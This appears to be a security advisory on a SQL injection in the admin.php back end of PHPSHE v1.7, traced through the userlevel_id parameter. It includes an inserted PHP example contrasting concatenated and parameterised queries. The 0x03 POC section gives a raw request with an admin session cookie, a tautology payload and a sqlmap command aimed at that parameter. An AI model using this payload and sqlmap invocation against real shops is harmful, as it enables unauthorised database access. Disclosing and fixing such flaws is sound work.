Description
0x01 Vulnerability description
Test object:
(1) Website: PHPSHE shopping system V1.7
(2) Website domain name: http://www.phpshe.com/
(3) Download address: http://www.phpshe.com/down/phpshe1.7.rar
(4) Version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Vulnerability description:
SQL injection in the administrative back end (admin.php) of the PHPSHE CMS system by Lingbao Jianhao Network Technology Co., Ltd.
0x02 Vulnerability details
Line 87 of admin.php dispatches on the mod parameter and includes user.php.
Line 7 of user.php includes user.hook.php.
Line 155 of user.hook.php calls pe_select to look up the user level selected by the userlevel_id request parameter.
pe_select is defined on line 208 of ../include/class/db.class.php.
Inside pe_select, the value of userlevel_id passes through the _dowhere function, which builds the WHERE clause, and is finally concatenated directly into the SQL statement. No escaping, casting or other security filtering is applied anywhere on this path, so the attacker controls part of the query text.
The code of the _dowhere function:
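The following is an added illustration of the pattern the advisory describes, not PHPSHE's own code: a minimal WHERE-clause builder that splices values into the query text, placed beside a hardened version that binds them as parameters. The function names dowhere_vulnerable, pe_select_vulnerable, dowhere_safe and pe_select_safe, the table name pe_userlevel and the payload string are all assumptions made for the example.

```php
<?php
// Added example (not code from PHPSHE). Function and table names are assumed.

// --- Vulnerable pattern: the where-builder concatenates request values ---
function dowhere_vulnerable(array $where): string
{
    $parts = [];
    foreach ($where as $col => $val) {
        // The value is spliced in verbatim, so a quote in it ends the literal
        $parts[] = "`$col` = '$val'";
    }
    return $parts ? ' WHERE ' . implode(' AND ', $parts) : '';
}

// Returns the SQL text so the effect of the payload can be inspected
function pe_select_vulnerable(string $table, array $where): string
{
    return "SELECT * FROM `$table`" . dowhere_vulnerable($where);
}

// --- Hardened form: placeholders in the text, values bound separately ---
function dowhere_safe(array $where): array
{
    $parts  = [];
    $params = [];
    foreach ($where as $col => $val) {
        // Column names come from code, not from the request; still restrict them
        if (!preg_match('/^[a-z_]+$/', $col)) {
            throw new InvalidArgumentException("bad column: $col");
        }
        $parts[]  = "`$col` = ?";
        $params[] = $val;
    }
    $sql = $parts ? ' WHERE ' . implode(' AND ', $parts) : '';
    return [$sql, $params];
}

function pe_select_safe(PDO $pdo, string $table, array $where): array
{
    [$clause, $params] = dowhere_safe($where);
    $stmt = $pdo->prepare("SELECT * FROM `$table`" . $clause);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed payload standing in for a malicious userlevel_id value
$payload = "1' OR '1'='1";

// Vulnerable path: print the query text that would reach MySQL
echo pe_select_vulnerable('pe_userlevel', ['userlevel_id' => $payload]), "\n";

// Hardened path, exercised against an in-memory SQLite table built here
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE pe_userlevel (userlevel_id INTEGER, userlevel_name TEXT)');
$pdo->exec("INSERT INTO pe_userlevel VALUES (1, 'normal'), (2, 'vip')");

$rows = pe_select_safe($pdo, 'pe_userlevel', ['userlevel_id' => $payload]);
echo "payload as bound parameter: ", count($rows), " row(s)\n";

$rows = pe_select_safe($pdo, 'pe_userlevel', ['userlevel_id' => '1']);
echo "legitimate id as bound parameter: ", count($rows), " row(s)\n";
```

In the vulnerable path the payload turns the clause into `userlevel_id` = '1' OR '1'='1', which is true for every row and gives sqlmap its foothold; in the hardened path the same string is bound as one literal, matches nothing, and only the legitimate value '1' returns a row. Where a column is numeric, casting with intval() before the query is a second, cheaper layer of defence, but it does not replace parameter binding for string columns.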
0x03 POC
Vulnerable parameter: userlevel_id. Because this is a back-end vulnerability, the request is sent with the session cookie of a logged-in administrator.
GET /phpshe1.7/admin.php?mod=user&userlevel_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r3kqgf03cae7qguj1sjncb5apk
Upgrade-Insecure-Requests: 1
Vulnerability verification method: save the request above as 1.txt and run
python sqlmap.py -r 1.txt --batch -o --dbms=mysql --level 3 -p userlevel_id